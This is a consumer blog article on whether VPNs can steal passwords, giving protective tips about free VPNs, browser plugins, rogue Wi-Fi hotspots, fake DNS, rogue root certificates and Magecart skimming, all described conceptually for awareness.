It’s always a worry about VPNs trying to steal passwords and when I was looking at choosing the right VPN. I looked at the security offered and the integrity of the VPN provider, especially as passwords would pass through the VPN.
Can a VPN steal passwords? As a general rule, a VPN can steal passwords when insecure connections are made to websites using HTTP instead of HTTPS, as the VPN can see the passwords in clear text but if a secure HTTPS connection is made, a VPN will not be able to see the passwords. Some VPNs can install malicious malware, key loggers and scripts to steal passwords as they are typed into a web browser.
Insecure connections using HTTP where the domain name of the website has the http is appended to the start of the domain name, like http://www.bbc.com. Means the connection to the website is not encrypted and any information send over the this connection could be seen if intercepted by a malicious party like a hacker or a rogue VPN.
When the connection is made using https, like https://www.bbc.com, this means the connection is secure as it is encrypted and this makes it difficult for the information to be seen even if the information is captured by a malicious hacker. This is because the information is encrypted and without knowing the decryption keys to turn the encrypted information back to it’s original format, the information is useless to the hacker.
Using a public Wi-Fi where a hacker has control over the Wi-Fi hotspot, will easily allow them to see all the traffic passing through. Any traffic passing through using http connections will be clearly seen as it’s not encrypted and traffic using https will only show encrypted information and this will be no use to the hacker.
It is vital to always make sure any connections you make to websites where you need to protect your information like you personal details, credit card information to medical information is made securely, ideally using a https connection. As this will ensure the information is sent using an encrypted channel to the website you’re entering your information on.
VPNs can provide an additional layer of security by protecting your information as the VPN provides an encrypted connection but it’s important to realize this is only as far as the VPN server you’re connected to. So, it still makes sense you use a https connection as the traffic leaving the VPN and heading towards the website you’re visiting must still be encrypted for your protection.
The following tips are a must to protect your passwords online when using VPNs:
- Watch out for sneaky FREE VPNs
- Plug-in VPNs can sniff your password
- Untrusted connections across VPNs can be sniffed
- Avoid FAKE password-stealing public wifi hotspots
- Avoid VPNs with FAKE DNS
- Avoid self-signing certificate tricks from rogue VPNs
- Watch out for Magecart infections
Rogue VPNs that are malicious will try to trick people into giving them their passwords using sneaky techniques but you can take the following steps to protect yourself.
Here are 8 steps in detail that you can take to make sure your passwords are kept safe at all times from a VPN.
1. Watch out for sneaky FREE VPNs
As the old saying ‘beware of Greeks bearing gifts’ shows, something that looks good can actually be malicious and designed to lure unsuspecting individuals. When something is FREE, it may mean there’s a catch.
With some FREE VPNs, they are only designed and built for one purpose only, and that is to steal information, in particular password credentials for banking websites, email sites to popular social media sites.
As most VPNs can require elevated privileges to install their software, this gives the VPN permissions to access the system as an administrator would. This level of elevated power gives the VPN provider opportunities to infect.
On some systems especially Microsoft Windows-based systems, this means the administrator type privileges will allow the VPN to install not just it’s VPN software but also malicious software and components like potentially unwanted programs (PUP) or potentially unwanted applications (PUA).
Can a VPN see my passwords? A VPN can only see passwords if HTTP connections are made to websites, as these connections are not encrypted. By using the securer HTTPS connections which are encrypted makes it near impossible for the VPN to see any information passing through like passwords.
Harvesting passwords using malware is becoming more common, as hackers find it more difficult to hack into secure communications like encrypted VPN connections and encrypted connections to websites. By using malware, hackers have an easier method to capture passwords and other sensitive information.
Use a reputable VPN
By using a reputable VPN provider, the likelihood of passwords potentially being stolen can be minimised. The reputation of these VPNs is paramount in protecting their customers and they will endeavour to make sure anyone connecting using their VPNs does so without any of their data including credentials being stolen.
Reputable VPNs will offer a good level of encryption, as not all encryption is equal. Weaker encryption can easily be broken using today’s computing processing power.
How can the average VPN user be sure their VPN is encrypting their communications? Without technical skills, it becomes difficult to check on whether the VPN is encrypting the communications at all. A reputable VPN will provide confidence in that they are encrypting all communications. A fake VPN might not even bother to encrypt, let alone use a weak encryption algorithm.
2. Plug-in VPNs can sniff your password
Many VPN providers provide web browser plugins for popular browsers like Google’s Chrome to Mozilla’s Firefox. These VPN plugins once installed will direct any traffic sent from the web browser through a VPN connection.
Using a full VPN software instead of one limited to a plugin in a web browser will mean all internet and web browser traffic will move along an encrypted VPN tunnel.
If the VPN plugin gets hijacked (hacked), it will be quite easy for hackers to set up web pages that look like common web site pages, fooling people into thinking they are entering their banking credentials for example into their bank’s website, when they are in fact entering these into a fake website.
This type of phishing attack is sophisticated enough at times to fool even the most security-conscious individual.
It’s also important to note with a VPN plugin, not all the internet traffic from the user’s device will go across the VPN, as only the web traffic initiated through the user’s web browser will do this.
Any banking applications, social media applications which use their own applications instead of using a web browser won’t be directed through the VPN plugin, as the VPN plugin is limited to web traffic only from the web browser. This leaves the user’s applications running natively on their device open to attack, more so if they are not using encrypted connections.
3. Untrusted connections across VPNs can be sniffed
It’s vitally important to connect to websites using secure connections, as the VPN could take advantage of people connecting using insecure website connections, making it easier for them to steal passwords.
Connecting to a website using HTTP instead of the securer HTTPS at the start of the website address, will mean any passwords or confidential information entered into the website forms, will not be securely transmitted, leading to leaking of the passwords across the communications that is the internet.
The VPN service could use network sniffing tools and quite easily capture these unencrypted passwords and then use them maliciously to log into banking sites to social media sites.
Connecting using weak communication channels, that is the encryption used for the HTTPS or SSL connection uses a weak or obsolete cypher then this can easily be hacked and the sensitive data such as passwords stolen.
To make sure the VPN can’t steal passwords, it’s important to use secure connections to websites with a good level of encryption between the web browser and the website being visited. The padlock icon below shows the connection is encrypted.
Use HTTPS connections only
The connection from a device to the VPN service will be encrypted using a VPN secure tunnel but once the connection passes through the VPN service the connection won’t be running through the VPN tunnel anymore. Instead, it will pass out of the VPN server into the internet and onwards to it’s intended destination.
If you’ve connected to a website using HTTP instead of HTTPS, the information is only safe from prying eyes whilst in the VPN tunnel (assuming the VPN can be trusted). As the connection leaves the VPN server towards the intended website, the connection isn’t protected by encryption anymore. It could easily be intercepted and the information like passwords could be captured.
It’s important to make sure all connections to websites are done using the HTTPS, this ensures the encryption is end-to-end, between the web browser and the website. The VPN provider won’t be able to snoop on any of the information in the HTTPS connection, nor will services traversed after leaving the VPN server.
Use Secure FTP
If you’re uploading data or downloading data using FTP, you are potentially putting your passwords out into the open for the VPN or other services to potentially get access. Use FTP over TLS (explicit) as this will make a secure encryption connection over which the user and password credentials will be sent.
4. Avoid FAKE password-stealing public wifi hotspots
Be wary of dodgy WiFi Hotspots as hackers can quite easily set these up and trick users to connect. When users connect to these rogue hot spots, they inadvertently could download rogue software, that is malware.
This malware could include keylogging functionality that captures information being entered into website forms, such as when logging into bank websites. So even with a VPN connection is used, the WiFi Hot Spot itself with its malware is actively stealing passwords.
Setting up a WiFi Hotspot is fairly straightforward, someone inside Starbucks having a coffee could see a Starbucks_Coffee_WiFi Hotspot is available, this might not necessarily mean this is genuine.
The real WiFi Hotspot could be just called Starbucks but a hacker could set up their phone or other devices with a Wireless Hotspot with a similar name to Starbucks but append it with an underscore (“_”).
Most people will see this WiFi Hotspot before the real WiFi Hotspot, as alphabetically the underscore could be shown before names without an underscore. They will assume it looks authentic and will connect to it.
Hackers also try to create WiFi Hotspot in the vicinity of the intended user(s) that they want to log onto their network, their WiFi Hotspot gives out a stronger signal so can rise to the top of the available WiFi Hotspots available, as most phones and laptops automatically prioritise WiFi based on signal strength.
There is also the possibility of connections using public WiFi Hotspots being hacked by using a technique called SSL stripping, where the hacker sits in the middle of the connection (Man in the Middle attack) and is able to phish users into entering passwords credentials into insecure versions of websites.
Find out more, on whether it is safe to use public Wi-Fi with a VPN, where I discuss this in more detail.
5. Avoid VPNs with FAKE DNS
Some VPNs install configuration that changes how traffic to the internet is sent, including assigning their own DNS service. The DNS service is responsible for converting the website address to a four-octet number, this number assigned to the website, allows the communication to travel across the internet.
If the DNS service takes a website address and assigns a different four-octet number, the person entering the website name into their web browser would be oblivious to connecting to a different website, to them as long as it looks like where they intended to go, it’s fine. Irrespective of whether this new website is actually a phishing website designed to grab their credentials.
It’s imperative the DNS services used by the VPN are not malicious (DNS poisoning) and route the internet traffic to the correct website destinations. A reputable VPN will use reputable DNS services.
6. Avoid self-signing certificate tricks from rogue VPNs
If the VPN can install a self-signed root (HTTPS) certificate as part of the installation process onto the user’s computer. This could allow the VPN software to intercept any encrypted traffic sent from the user’s computer to any website the user visits.
Even if that website is connected to using encrypted communication, like HTTPS, it will make it possible to read the contents of the communication.
When the user visits a website using HTTPS, the assumption this would be an encrypted connection is only true to a point, as the VPN can sit in between the connection as a Man in the Middle (MitM), allowing it to read passwords and any data sent down a supposed encrypted communication.
The VPN can use the root certificate it installed to falsely represents itself as a trusted party in the certificate chain, in essence becoming the root Certificate Authority (CA).
This allows it to decide what encrypted communications can be trusted and worryingly generate its own certificates, such as those for banks, email services (e.g. Gmail, Hotmail), Facebook, virtually any website certificate could be generated.
The user’s web browser will not pick up on the security certificate is fake, as to all intents and purposes the certificate was signed by a trusted party, that is the root certificate the VPN installed.
When the user goes to the website of their bank, for instance, the VPN will sit looking out for data being sent from the log on pages to the bank and will quite easily be able to intercept this, as the Man in the Middle.
Choosing a reputable VPN provider can minimise on being duped into installing a self-signed root certificate that will allow the VPN provider open access.
7. Watch out for Magecart infections
Even with a VPN if you visit a website infected with the Magecart infection, the chances of sensitive information like credit card details and passwords being stolen increase.
These Magecart infections manipulate the scripts used by websites by injecting their own malicious code inside the scripts. When entering information into a website infected by Magecart, the malicious script is able to read information from the website like passwords and pass them onto hackers.
This act of skimming personal information from websites has affected some big name websites including British Airways, Ticketmaster to name a few. Bloombery reckoned in October 2019 there were over 2 million infections, so this has exponentially increased since.
The Magecart is able to infect third party sites used by websites for their scripts, once these third party scripts are infected the Magecart infection quickly spread to all websites using these scripts.
How can you avoid Magecart infected websites? There is an article on the Trustwave website which goes through a number of steps that can be taken to check if a website is infected with the Magecart infection.
It is highly advisable to choose a reputable VPN to make sure your personal information like passwords is kept safe at all times. If you are unsure which VPN to choose, please read my article on how to get a VPN, where I look at the 10 best ways to get one.
Is a VPN safe for online banking? Yes, but only if you use a reputable VPN that doesn’t install any additional keylogging or snooping software to steal passwords.
Can you be tracked if you use a VPN? Yes, you can be tracked if you use a VPN that leaves logs or doesn’t mask your internet protocol (IP) address effectively enough.